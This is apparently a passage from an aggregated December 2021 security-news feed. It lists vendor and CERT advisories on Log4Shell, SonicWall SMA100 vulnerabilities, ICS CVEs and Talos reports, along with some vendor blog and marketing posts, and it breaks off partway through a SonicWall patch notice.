https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0031
SonicWall SMA100 API username enumeration vulnerability
2021-12-21T11:24:05Z | 1640085845

A vulnerability in SonicWall SMA100 password change API allows a remote unauthenticated attacker to perform SMA100 username enumeration based on the server responses. This vulnerability affected 10.2.1.2-24sv, 10.2.0.8-37sv and earlier 10.x versions. CVE: CVE-2021-20049 Last updated: Dec. 21, 2021, 11:24 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0030
How to Secure Remote Access
2021-12-21T08:05:27Z | 1640073927

Hundreds of millions of people worldwide were directed to work remotely in 2020 in response to pandemic lockdowns. Even as such restrictions are beginning to ease in some countries and employees are slowly returning to their offices, remote work continues to be a popular workstyle for many people. Last June, Gartner surveyed more than 100... The post How to Secure Remote Access appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-secure-remote-access/
Security Alert (A21-12-11) Multiple Vulnerabilities in Apache HTTP Server
2021-12-21T04:00:00Z | 1640059200

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-44463
2021-12-21T00:00:00Z | 1640044800

CWE-427: UNCONTROLLED SEARCH PATH ELEMENT Missing DLLs, if replaced by an insider, could allow an attacker to achieve local privilege escalation when some DeltaV services are started.

https://claroty.com/team82/disclosure-dashboard/cve-2021-44463
CVE-2021-26264
2021-12-21T00:00:00Z | 1640044800

CWE-306: MISSING AUTHENTICATION FOR CRITICAL FUNCTION A specially crafted script could cause a controller to restart and cause a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2021-26264
Akamai Reports Another DoS in Log4j2 (CVE-2021-45105): What You Need to Know
2021-12-20T18:30:57Z | 1640025057

The series of vulnerabilities recently discovered in Log4j2 has shocked the internet. As part of our continuing research, on December 17, Hideki Okamoto from Akamai found and responsibly reported an additional denial-of-service (DoS) vulnerability, which was assigned as CVE-2021-45105.

https://www.akamai.com/blog/security/akamai-reports-another-dos-inlog4j2
Zero Trust migration: where do I start?
2021-12-20T11:40:48Z | 1640000448

How to start the journey to zero trust architecture once you have decided it meets your business requirements.

https://www.ncsc.gov.uk/blog-post/zero-trust-migration-where-do-i-start
RIA peadirektori asetäitjaks saab Joonas Heiter
2021-12-20T11:19:52Z | 1639999192

1. jaanuarist hakkab RIA riigi infosüsteemi teenistust (RIS) tüürima Joonas Heiter, kes alates 2018. aastast on juhtinud samas teenistuses andmevahetuse osakonda.

https://ria.ee/uudised/ria-peadirektori-asetaitjaks-saab-joonas-heiter
Why vulnerabilities are like buses
2021-12-20T09:47:15Z | 1639993635

How organisations can address the growing trend in which multiple vulnerabilities within a single product are exploited over a short period.

https://www.ncsc.gov.uk/blog-post/why-vulnerabilities-are-like-buses
RIS infokiri – detsember 2021
2021-12-20T07:18:04Z | 1639984684

Selle aasta viimases RISi infokirjas tutvustame kaht uut riigi IT-juhti ning võtame kokku detsembri alguses toimunud RIA veebiseminaril kõlanud ettekanded ja arutelud. Teeme ülevaate oktoobris toimunud valimiste köögipoolest – millised olid RIA õppetunnid ning soovime 17. detsembril 20-aastaseks saanud X-teele pikka ja edukat iga.

https://ria.ee/uudised/ris-infokiri-detsember-2021
High Threat Security Alert (A21-12-10): Vulnerability in Apache Log4j
2021-12-20T04:00:00Z | 1639972800

Apache Software Foundation has released a security advisory to address a vulnerability in Apache Log4j. Reports indicate that a proof-of-concept (PoC) code for a new denial of service vulnerability (CVE-2021-45105) in Apache Log4j is publicly available.

https://www.govcert.gov.hk/en/alerts_detail.php
Garrett Metal Detectors iC Module CMA CLI readfile stack-based buffer overflow vulnerabilities
2021-12-20T00:00:00Z | 1639958400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1357
Garrett Metal Detectors iC Module CMA check_udp_crc memcpy stack-based buffer overflow vulnerability
2021-12-20T00:00:00Z | 1639958400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1353
Garrett Metal Detectors iC Module CMA CLI del[env] command directory traversal vulnerabilities
2021-12-20T00:00:00Z | 1639958400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1359
Garrett Metal Detectors iC Module CMA CLI setenv command directory traversal vulnerability
2021-12-20T00:00:00Z | 1639958400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1356
Garrett Metal Detectors iC Module CMA check_udp_crc strcpy stack-based buffer overflow vulnerability
2021-12-20T00:00:00Z | 1639958400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1355
Blackmagic Design DaVinci Resolve R3D DPDecoder Service frame parsing uninitialized uuid object vulnerability
2021-12-20T00:00:00Z | 1639958400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1427
Garrett Metal Detectors iC Module CMA CLI getenv command directory traversal vulnerability
2021-12-20T00:00:00Z | 1639958400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1358
Blackmagic Design DaVinci Resolve R3D DPDecoder Service frame decoding heap-based buffer overflow vulnerability
2021-12-20T00:00:00Z | 1639958400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1426
Garrett Metal Detectors iC Module CMA run_server_6877 authentication bypass vulnerability
2021-12-20T00:00:00Z | 1639958400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1354
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
2021-12-17T19:30:00Z | 1639769400

Continuing with our research into CVE-2021-44228, Akamai has previously written about what the vulnerability is and given recommendations on how to go beyond patching for extra protection. Across the Akamai network, we see traffic from 1.3 billion unique devices daily, with record traffic of 182 Tbps. The threat research team has been investigating this traffic to gain deeper insights into how this vulnerability is being exploited. We want to share more technical findings and what they mean for threat hunters. Here are some implications for defenders and threat hunters to consider

https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
CVE-2021-32499
2021-12-17T00:00:00Z | 1639699200

The command line arguments that are passed to an emulator when starting it via SOPAS ET, are part of the SDD manifest. Attackers could manipulate the arguments to pass in any value to the executable. In combination with CVE-2021-32498 the attacker could target an arbitrary executable with any arguments on the host system.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32499
CVE-2021-32498
2021-12-17T00:00:00Z | 1639699200

When an SDD contains an emulator, the emulator location is part of the SDD manifest. Attackers could manipulate this location and use path traversal to target an arbitrary executable located on the host system. When the user starts the emulator from SOPAS ET, the corresponding executable will be started instead of the emulator.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32498
CVE-2021-32497
2021-12-17T00:00:00Z | 1639699200

SDD files might contain an executable file that will be listed as the Emulators inside SOPAS ET. When a user starts the emulator, the executable is run without further checks. Attackers could wrap any executable file into an SDD and provide this to a SOPAS ET user. When installing the SDD the user may not be aware about the executable inside of the SDD.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32497
Detecting MISO and Opyn’s msg.value reuse vulnerability with Slither
2021-12-16T18:00:49Z | 1639677649

On August 18, 2021, samczsun reported a critical vulnerability in SushiSwap’s MISO smart contracts, which put ~350 million USD (109 thousand ETH) at risk. This issue is similar to an attack that was conducted on the Opyn codebase in August of 2020. At the time of the report, I was finishing my […]

https://blog.trailofbits.com/2021/12/16/detecting-miso-and-opyns-msg-value-reuse-vulnerability-with-slither/
What does your code use, and is it vulnerable? It-depends!
2021-12-16T13:00:14Z | 1639659614

You just cloned a fresh source code repository and want to get a quick sense of its dependencies. Our tool, it-depends, can get you there. We are proud to announce the release of it-depends, an open-source tool for automatic enumeration of dependencies. You simply point it to a source code repository, and it will build […]

https://blog.trailofbits.com/2021/12/16/it-depends/
Akamai Recommendations for Log4j Mitigation
2021-12-16T10:30:00Z | 1639650600

https://www.akamai.com/blog/security/akamai-recommendations-for-log4j-mitigation
Livery Delivers a Seamless Low Latency Streaming Experience with Help from Akamai
2021-12-15T14:00:00Z | 1639576800

Our new normal has ushered in the advent of hybrid events ? a mix of in-person and virtual events. This has made seamless live streaming with active participation of the audience, both live and remote, more important than ever. Amsterdam-headquartered company Livery is an end-to-end SaaS solution running on the Akamai content distribution network (CDN), which is perfectly suited for interactive sports, interactive learning, and live commerce productions. We?re delighted that they have chosen to work with us to deliver the experience their clients have come to love.

https://www.akamai.com/blog/performance/livery-delivers-a-seamless-low-latency-streaming-experience-with-help-from-akamai
Log4j alert changed to red – one of the most significant vulnerabilities in history
2021-12-15T08:30:39Z | 1639557039

The yellow alert issued on 10 December 2021 was changed to red as the severity of the vulnerability became better known. The vulnerable Log4j component is widely used in online services, and new exploits are constantly discovered. Administrators must take immediate action to respond to the issue. This article gives answers to frequently asked questions.

https://www.kyberturvallisuuskeskus.fi/en/varo_ttn2_5/2021
Log4j alert changed to red – one of the most significant vulnerabilities in history
2021-12-15T08:30:39Z | 1639557039

The yellow alert issued on 10 December 2021 was changed to red as the severity of the vulnerability became better known. The vulnerable Log4j component is widely used in online services, and new exploits are constantly discovered. Administrators must take immediate action to respond to the issue. This article gives answers to frequently asked questions.

https://www.kyberturvallisuuskeskus.fi/en/varo_ttn2_5/2021
High Threat Security Alert (A21-12-09): Multiple Vulnerabilities in Microsoft Products (December 2021)
2021-12-15T04:00:00Z | 1639540800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Magecart Skimmers Are Alive and Well ? Constant Vigilance Is Required
2021-12-14T14:00:00Z | 1639490400

Magecart skimmers are here to stay, and they?re becoming more sophisticated, more creative, and harder to detect. In this post, we reveal a new skimmer infrastructure that targets ecommerce sites all over the world with advanced methods of detection evasion and obfuscation.

https://www.akamai.com/blog/security/magecart-skimmers-are-alive-and-well-constant-vigilance-is-required
Independent Compliance and Security Assessment – Two Additions to the All-New Cato Management Application
2021-12-14T12:56:54Z | 1639486614

If a picture tells a thousand words, then a new user interface tells a million. The new Cato Management Application that we announced today certainly brings a scalable, powerful interface. But it’s far more than just another pretty face. It’s a complete restructuring of the backend event architecture and a new frontend with more than... The post Independent Compliance and Security Assessment – Two Additions to the All-New Cato Management Application appeared first on Cato Networks.

https://www.catonetworks.com/blog/independent-compliance-and-security-assessment-two-additions-to-the-all-new-cato-management-application/
High Threat Security Alert (A21-12-07): Multiple vulnerabilities in Google Chrome
2021-12-14T04:00:00Z | 1639454400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-12-08): Multiple Vulnerabilities in Apple iOS and iPadOS
2021-12-14T04:00:00Z | 1639454400

Apple has released iOS 15.2 and iPadOS 15.2 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-27410
2021-12-14T00:00:00Z | 1639440000

CWE-787: OUT-OF-BOUNDS WRITE The affected product is vulnerable to an out-of-bounds write, which may result in corruption of data or code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2021-27410
CVE-2021-27408
2021-12-14T00:00:00Z | 1639440000

CWE-125: OUT-OF-BOUNDS READ The affected product is vulnerable to an out-of-bounds read, which can cause information leakage leading to arbitrary code execution if chained to the out-of-bounds write vulnerability.

https://claroty.com/team82/disclosure-dashboard/cve-2021-27408
Log4J – A Look into Threat Actors Exploitation Attempts
2021-12-13T14:02:33Z | 1639404153

On December 9, a critical zero-day vulnerability was discovered in Apache Log4j, a very common Java logging tool. Exploiting this vulnerability allows attackers to take control over the affected servers, and this prompted a CVSS (Common Vulnerability Scoring System) severity level of 10. LogJam, also known as Log4Shell, is particularly dangerous because of its simplicity... The post Log4J – A Look into Threat Actors Exploitation Attempts appeared first on Cato Networks.

https://www.catonetworks.com/blog/log4j-a-look-into-threat-actors-exploitation-attempts/
Log4j component vulnerability actively exploited – install updates immediately!
2021-12-13T08:44:03Z | 1639385043

The vulnerable Log4j component is widely used in online services, and new exploits are constantly discovered. Administrators must take immediate action to respond to the issue.

https://www.kyberturvallisuuskeskus.fi/en/varoitus_5/2021
Severe alert issued on an actively exploited Log4j vulnerability
2021-12-13T08:38:34Z | 1639384714

Apache Log4j is a Java-based component that can be used in applications to log events and messages. Log4j is extremely widely used in different services and applications. Because of its popularity, many services online are affected by the zero-day vulnerability that has now been published.

https://www.kyberturvallisuuskeskus.fi/en/varo_ttn_5/2021
Severe alert issued on an actively exploited Log4j vulnerability
2021-12-13T08:38:34Z | 1639384714

Apache Log4j is a Java-based component that can be used in applications to log events and messages. Log4j is extremely widely used in different services and applications. Because of its popularity, many services online are affected by the zero-day vulnerability that has now been published.

https://www.kyberturvallisuuskeskus.fi/en/varo_ttn_5/2021
Security Alert (A21-12-06): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2021-12-13T04:00:00Z | 1639368000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability
2021-12-12T16:00:30Z | 1639324830

On December 9th, 2021, the security industry became aware of a new vulnerability, CVE-2021-44228. With a CVSS (Common Vulnerability Scoring System) score of a perfect 10.0, CVE-2021-442288 has the highest and most critical alert level. To give some technical background, a flaw was found in the Java logging library “Apache Log4j 2” in versions from... The post Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-networks-rapid-response-to-the-apache-log4j-remote-code-execution-vulnerability/
Värske turvanõrkus seab ohtu ka Eesti ettevõtted ja asutused
2021-12-11T12:12:18Z | 1639224738

Üle maailma laialt kasutatud Java programmeerimiskeele ühes funktsioonis peitub kriitiline turvanõrkus, mille kaudu saab ründaja serveri oma kontrolli alla. Turvanõrkusest on mõjutatud näiteks Apple'i ja Minecrafti serverid, aga ka Eesti ettevõtted ja asutused.

https://ria.ee/uudised/varske-turvanorkus-seab-ohtu-ka-eesti-ettevotted-ja-asutused
CVE-2021-44228 - Patching is Recommended for Evolving Zero Day Vulnerability in Apache Log4j that allows remote code execution (RCE)
2021-12-11T11:00:53Z | 1639220453

Akamai has been monitoring the rapidly evolving developments of CVE-2021-44228. We have been working closely with our customers and internal application teams to mitigate the risks posed by the threat of unauthorized remote code execution. This includes deploying an update to our existing Apache WAF rules to include mitigation for this Zero Day CVE, and updating the Log4j library to version 2.15.0 or later.

https://www.akamai.com/blog/news/CVE-2021-44228-Patching-is-Recommended
Apache Log4j Remote Code Execution Vulnerability - "Log4Shell" CVE-2021-44228, CVE-2021-45046, CVE-2021-45105
2021-12-11T03:28:56Z | 1639193336

This advisory will cover the Apache Log4j suite of vulnerabilities impacting the 2.x branch, CVE-2021-44228 being the most Critical (CVSS 10.0).- On December 10, 2021, Apache released Log4j 2.15.0 for Java 8 users to address a remote code execution (RCE) vulnerability—CVE-2021-44228.- On December 13, 2021, Apache released Log4j 2.12.2 for Java 7 users and Log4j 2.16.0 for Java 8 users to address a RCE vulnerability—CVE-2021-45046.- On December 17, 2021, Apache released Log4j 2.17.0 for Java 8 users to address a denial-of-service (DOS) vulnerability—CVE-2021-45105.- On December 28, 2021, Apache released Log4j 2.17.1 for Java 8 users to address a RCE vulnerability—CVE-2021-44832. SonicWall Product (Appliance/Cloud/Virtual/OnPrem) Status Description Email Security- Hosted Email Security (HES)- On-Premise Email Security  Impacted Log4j 2.17.0: A new ES HotFix 10.0.13 is available for download remediating CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105. Hosted Email Security (HES) has been automatically patched and no action is required by customers.Log4j 2.17.1: SonicWall performed a comprehensive analysis of Email Security resulting in no observable attack vectors for CVE-2021-44832. To remove known or potential risk from customer environments, SonicWall is working to publish an upgraded Email Security patch out of an abundance of caution to include the latest Log4j 2.17.1 version. NSM- NSM SaaS          - NSM On-Premise Impacted  Log4j 2.17.0: NSM On-Prem HotFix 2.3.2-R12-H2 is available for download with log4j 2.17.0 remediating CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.Log4j 2.17.1: NSM SaaS 2.3.2-H8 has been automatically patched with log4j 2.17.1 and no action is required by customers.SonicWall performed a comprehensive analysis of NSM that resulted in no observable attack vectors for CVE-2021-44832. To remove known or potential risk from customer environments, SonicWall is working to publish an upgraded NSM (On-Prem) firmware out of an abundance of caution to include the latest Log4j 2.17.1 version. WAF Partially Impacted  WAF 3.x uses Log4j, but only when the legacy ‘Cloud Management’ feature is enabled. SonicWall recommends customers disable 'Cloud Management' if enabled. This change will not impact functionality. This feature is disabled by default. WAF 2.x and earlier versions don't use Log4j and are not impacted.. Gen5 Firewalls (EOS)- TZ100/W- TZ200/W- TZ210/W- NSA 220/W- NSA 250M/250M-W- NSA 2400/MX/3500/4500/5500- NSA E5500/6500/6500/8500/8510 Not Impacted Log4j2 not used in the appliance. Gen6 Firewalls- TZ300/W; TZ350/W- TZ400/W- TZ500/W- TZ600- NSA 2600/2650/3600/3650/4600/4650/5600/5650/6600/6650- SM 9200/9400/9600/9800- NSa 9250/9450/9650- NSSP 12400/12800- NSV 10/25/50/100/200/400/800/1600 (ESX, KVM, HYPER-V, AWS, Azure) Not Impacted Log4j2 not used in the appliance. Gen7 Firewalls- TZ270/W- TZ370/W- TZ470/W- TZ570/W- TZ670- NSA 2700/3700/4700/5700/6700- NSSP 10700/11700/13700/15700- NSV 270/470/870 (ESX, KVM, HYPER-V, AWS, Azure) Not Impacted Log4j2 not used in the appliance. SonicWall Switch- SWS 12-8/12-8POE- SWS 12-10FPOE- SWS 14-24/14-24FPOE- SWS 14-48/14-48FPOE Not Impacted Log4j2 not used in the SonicWall Switch. SMA 100- SMA 200/210/400/410- SMA 500v (ESX, KVM, Hyper-V, AWS, Azure) Not Impacted Log4j2 not used in the SMA100 appliance. SMA 1000- SMA 6200/7200/6210/7210- SMA 8200v (ESX, KVM, Hyper-V, AWS, Azure)- SRA EX 7000  Not Impacted Version 12.x not using vulnerable Log4j version. MSW  Not Impacted Log4j not used in the Mysonicwall service. Analyzer Not Impacted Version Analyzer 1.x is not using the vulnerable Log4j version. GMS Not Impacted GMS version 9.x and 8.x are not using the vulnerable Log4j version. Capture Client & Capture Client Portal Not Impacted Log4j2 not used in the Capture Client. CAS Not Impacted Log4j2 not used in the CAS. Access Points  Not Impacted Log4j2 not used in the SonicWall Access Points WNM Not Impacted Log4j2 not used in the WNM. Capture Security Appliance  Not Impacted Log4j2 not used in the Capture Security appliance. WXA- WXA 2000/4000- Virtual: WXA 5000- Software: WXA 500, WXA 6000 Not Impacted WXA is not using the vulnerable Log4j version. CSCMA Not Impacted CSCMA is not using the vulnerable Log4j version. EPRS Not Impacted EPRS 1.x and 2.x are not using the vulnerable Log4j version. Cloud Edge Not Impacted Cloud Edge is not using the vulnerable Log4j version. Analytics Not Impacted  Analytics is not using the vulnerable Log4j version.  CVE: CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 Last updated: Jan. 8, 2022, 4:03 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
CVE-2021-44228 - Zero Day Vulnerability in Apache Log4j that allows remote code execution (RCE)
2021-12-10T21:00:00Z | 1639170000

See how Akamai helped open-source logging library Log4j fight against a critical unauthenticated remote code execution (RCE) vulnerability and reduce customer exposure.

https://www.akamai.com/blog/news/CVE-2021-44228-Zero-Day-Vulnerability
Announcing Property Manager Extensions for the Integrated Development Environment
2021-12-10T14:00:00Z | 1639144800

We?re proud to announce the 1.0 release of the Property Manager extension to Visual Studio Code and Eclipse. With the new Property Manager extension, you can edit and validate Property Manager API (PAPI) JSON rule trees right from your integrated development environment (IDE). It allows you to make and validate critical changes to your configuration closer to your DevOps environment. Once you've updated and validated the configuration file in your IDE, you can easily push it back to the platform with PAPI or Akamai command-line interface (CLI).

https://www.akamai.com/blog/news/announcing-property-manager-extensions-for-the-ide
Traficom looks for ways to block international scam calls
2021-12-10T13:07:14Z | 1639141634

The Finnish Transport and Communications Agency Traficom is working with Finnish telecommunications operators to find ways to prevent number spoofing, a method commonly used in scam calls. The aim is to make it more difficult for foreign criminals to operate in Finland and prevent these international call scams altogether.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-looks-ways-block-international-scam-calls
Traficom looks for ways to block international scam calls
2021-12-10T13:07:14Z | 1639141634

The Finnish Transport and Communications Agency Traficom is working with Finnish telecommunications operators to find ways to prevent number spoofing, a method commonly used in scam calls. The aim is to make it more difficult for foreign criminals to operate in Finland and prevent these international call scams altogether.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-looks-ways-block-international-scam-calls
Riik ei leidnud hankega mobiil-ID pakkujat
2021-12-10T07:56:52Z | 1639123012

PPA ja RIA tunnistasid kehtetuks mobiil-ID hanke. RIA töötab lahenduse kallal, mis tagaks riikliku mobiil-ID teenuse ka pärast praeguse lepingu lõppemist järgmise aasta keskel.

https://ria.ee/uudised/riik-ei-leidnud-hankega-mobiil-id-pakkujat
Security Alert (A21-12-05): High Threat Security Alert (A21-12-05): Vulnerability in Apache Log4j
2021-12-10T04:00:00Z | 1639108800

Apache Software Foundation has released a security advisory to address a vulnerability in Apache Log4j. Reports indicate that the vulnerability is being actively exploited and a proof-of-concept (PoC) code for the vulnerability is publicly available.

https://www.govcert.gov.hk/en/alerts_detail.php
Publicado Relatório sobre Políticas Públicas da Cibersegurança
2021-12-10T00:00:00Z | 1639094400

Este documento cumpre um dos objetivos do Observatório de Cibersegurança, que é o de acompanhar o desenvolvimento e aplicação de Políticas Públicas na área da cibersegurança. Para o efeito, este Relatório faz um levantamento das Estratégias e Programas Públicos nacionais relacionados com a cibersegurança e analisa os indicadores disponíveis sobre as perceções dos cidadãos no que se refere à interseção entre políticas públicas e segurança do ciberespaço. Estas análises são feitas dando conta do panorama nacional, mas também do posicionamento de Portugal no contexto da União Europeia.Consulte o documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135607/publicado-relatorio-sobre-politicas-publicas-da-ciberseguranca
What to expect when you’re expecting…SASE
2021-12-09T15:56:00Z | 1639065360

The post What to expect when you’re expecting…SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/what-to-expect-when-youre-expectingsase/
Security's Role in Internet Resilience
2021-12-09T14:00:00Z | 1639058400

One aspect of resilience on the internet is that things ? notably servers and resources ? move around. Sometimes moves are legitimate, such as when a popular site evolves from hosting their own website to moving to a cloud provider to using a CDN to handle the ever-increasing traffic. Sometimes the moves are not legitimate, such as when an attacker pretends to be an ecommerce or banking site and steals a user?s credentials upon login. How can the end user tell the difference between legitimate and not-so-legitimate moves?

https://www.akamai.com/blog/security/securitys-role-in-internet-resilience
Cato Demo: Deploy new site with network and security in 6-min or less
2021-12-09T09:19:57Z | 1639041597

The post Cato Demo: Deploy new site with network and security in 6-min or less appeared first on Cato Networks.

https://www.catonetworks.com/resources/deploy-your-site-in-under-6-minutes/
Security Alert (A21-12-03): Multiple Vulnerabilities in SonicWall SMA 100 Series Products
2021-12-09T04:00:00Z | 1639022400

SonicWall has released a security advisory to address multiple vulnerabilities in SMA 100 series products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-12-04): Multiple Vulnerabilities in Android
2021-12-09T04:00:00Z | 1639022400

Google has released Android Security Bulletin December 2021 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
2021 SOTI Security: Year End Review
2021-12-08T14:00:00Z | 1638972000

What a year 2021 has been. Even as the world continues to re-open to various degrees, we?re still feeling the impact from 2020?s move to an almost completely virtual world. Many large companies are shifting to a hybrid model, mixing the ability to work from home with working in the office. Some are even offering their employees the opportunity to work remotely indefinitely. There is no denying that the way we work, bank, play, and relax has been impacted by COVID-19. Shouting ?pivot? may have shot into popular culture in the TV show Friends, but it?s a rallying cry that?s been revived in the 2020s by businesses, individuals, and criminals alike.

https://www.akamai.com/blog/security/2021-soti-security-year-end-review
Wedia, Digital Asset Management Software Provider, Delivers Seamless Digital Experiences with Help from Akamai
2021-12-08T14:00:00Z | 1638972000

Wedia makes it possible for some of the world?s biggest companies to effectively manage, customize, and deliver their marketing assets. Akamai is delighted that this fantastic brand has chosen us to deliver a rich and engaging web experience for its customers while also ensuring the highest level of security for the great array of multimedia assets stored on their platform by a number of Fortune 500 companies.

https://www.akamai.com/blog/performance/wedia-delivers-seamless-digital-asset-management-with-help-from-akamai
New paper: Collector-stealer: a Russian origin credential and information extractor
2021-12-08T12:42:00Z | 1638967320

In a new paper, F5 researchers Aditya K Sood and Rohit Chaturvedi present a 360 analysis of Collector-stealer, a Russian-origin credential and information extractor. Read more

https://www.virusbulletin.com/blog/2021/12/new-paper-collector-stealer-russian-origin-credential-and-information-extractor/
SonicWall Global VPN Client DLL Search Order Hijacking
2021-12-08T08:29:59Z | 1638952199

SonicWall Global VPN client version 4.10.6 (32-bit and 64-bit) and earlier have a DLL Search Order Hijacking vulnerability. Successful exploitation via a local attacker could result in remote code execution in the target system.IMPORTANT: At the time of advisory, there is no evidence to suggest that this vulnerability is being exploited in the wild.  CVE: CVE-2021-20047 Last updated: Dec. 8, 2021, 8:29 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0025
Security Alert (A21-12-02): Multiple vulnerabilities in Firefox
2021-12-08T04:00:00Z | 1638936000

Mozilla has published the advisories (MFSA2021-52 and MFSA2021-53) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
SonicWall patches multiple SMA100 affected vulnerabilities
2021-12-07T18:20:23Z | 1638901223

SonicWall has verified and patched vulnerabilities of critical and medium severity (CVSS 5.3-9.8) in SMA 100 series appliances, which include SMA 200, 210, 400, 410 and 500v products. SMA 100 series appliances with WAF enabled are also impacted by the majority of these vulnerabilities.SonicWall strongly urges that organizations follow the guidance below to patch SMA 100 series products, which include SMA 200, 210, 400, 410 and 500v products. Issue ID Summary CVE CVSS Reporting Party SMA-3217 Unauthenticated Stack-Based Buffer Overflow CVE-2021-20038 9.8 Rapid7 SMA-3204 Authenticated Command Injection CVE-2021-20039 7.2 Rapid7 SMA-3206 Unauthenticated File Upload Path Traversal CVE-2021-20040 6.5 Rapid7 |NCCGroup SMA-3207 Unauthenticated CPU Exhaustion CVE-2021-20041 7.5 Rapid7 SMA-3208 Unauthenticated Confused Deputy CVE-2021-20042 6.3 Rapid7 SMA-3231 Heap-Based Buffer Overflow CVE-2021-20043 8.8 NCCGroup SMA-3233 Post-Authentication Remote Command Execution CVE-2021-20044 7.2 NCCGroup SMA-3235 Multiple Unauthenticated Heap-Based and Stack Based Buffer Overflow CVE-2021-20045 9.4 NCCGroup 1.  Security Notice: SMA-3217 - SMA100 Unauthenticated Stack-based buffer overflow (CVSS 9.8)A critical severity vulnerability (CVSS 9.8) in SMA 100 appliances, which includes SMA 200, 210, 400, 410 and 500v could allow a remote unauthenticated attacker to cause Stack-based Buffer Overflow and would result in code execution as the nobody user in the SMA100 appliance. It was noticed that the SMA 100 users with licensed/enabled WAF are impacted by this vulnerability.The Vulnerability is due to the SonicWall SMA SSLVPN Apache httpd server GET method of mod_cgi module environment variables use a single stack-based buffer using `strcat`. This allows remote attacker to cause Stack-based Buffer Overflow and would result in code execution.There is no evidence that this vulnerability is being exploited in the wild.SonicWall strongly urges that organizations follow the guidance below to patch SMA 100 series products, which include SMA 200, 210, 400, 410 and 500v.IMPACT:As outlined in SNWLID-2021-0026, successfully leveraging CVE-2021-20038 against impacted SMA 100 devices can result in the remote attacker being able to initiate the stack based buffer overflow which can potentially lead to code execution in the device. Impacted Platforms Impacted Versions SMA 100 Series (SMA 200, 210, 400, 410, 500v) 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv  2.  Security Notice: SMA-3204 - SMA 100 Series Authenticated Command Injection Vulnerability as Root (CVSS 7.2)A high severity vulnerability (CVSS 7.2) in SMA 100 appliances, which includes SMA 200, 210, 400, 410 and 500v could allow remote unauthenticated attacker to execute arbitrary commands in the SMA 100 appliance as root user. This can potentially lead to the remote authenticated attacker taking over the control of the SMA 100 appliance remotely. It was noticed that the SMA 100 users with licensed/enabled WAF are not impacted by this vulnerability.The Vulnerability is due to the SonicWall SMA SSLVPN `/cgi-bin/viewcert` POST http method which allows authenticated individuals to upload, view, or delete SSL certificates. A remote authenticated attacker can execute arbitrary commands using this POST http method.There is no evidence that this vulnerability is being exploited in the wild.SonicWall strongly urges that organizations follow the guidance below to patch SMA 100 series products, which include SMA 200, 210, 400, 410 and 500v.IMPACT:As outlined in SNWLID-2021-0026, successfully leveraging CVE-2021-20039 against impacted SMA 100 devices can result in the remote authenticated attacker executing arbitrary commands in the SMA 100 appliance as root user resulting in the remote takeover of the device. Impacted Platforms Impacted Versions SMA 100 Series (SMA 200, 210, 400, 410, 500v) 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv   3.  Security Notice: SMA-3206 - SMA 100 Series Unauthenticated File Upload Path Traversal Vulnerability (CVSS 6.5)A medium severity vulnerability (CVSS 6.5) in SMA 100 appliances, which includes SMA 200, 210, 400, 410 and 500v could allow remote unauthenticated attacker to upload arbitrary files. Attacker can upload crafted web pages to the web server's root directory or malicious files to any directory in the appliance as a nobody user. It was observed that SMA 100 devices with WAF licensed/enabled are also impacted by this vulnerability.This is due to the Path Traversal Attack Vulnerability. The Path traversal attacks vulnerability in SMA100 shares functionality that allows remote unauthenticated attacker to upload arbitrary files to any directory in the appliance.There is no evidence that this vulnerability is being exploited in the wild.SonicWall strongly urges that organizations follow the guidance below to patch SMA 100 series products, which include SMA 200, 210, 400, 410 and 500v.IMPACT:As outlined in SNWLID-2021-0026, successfully leveraging CVE-2021-20040 against impacted SMA 100 devices can allow the remote unauthenticated attacker to upload arbitrary files. The attacker can upload crafted web pages to the web server's root directory or malicious files to any directory in the appliance. Impacted Platforms Impacted Versions SMA 100 Series (SMA 200, 210, 400, 410, 500v) 10.2.0.8-37sv, 10.2.1.1-19sv   4.  Security Notice: SMA-3207 - SMA 100 Series 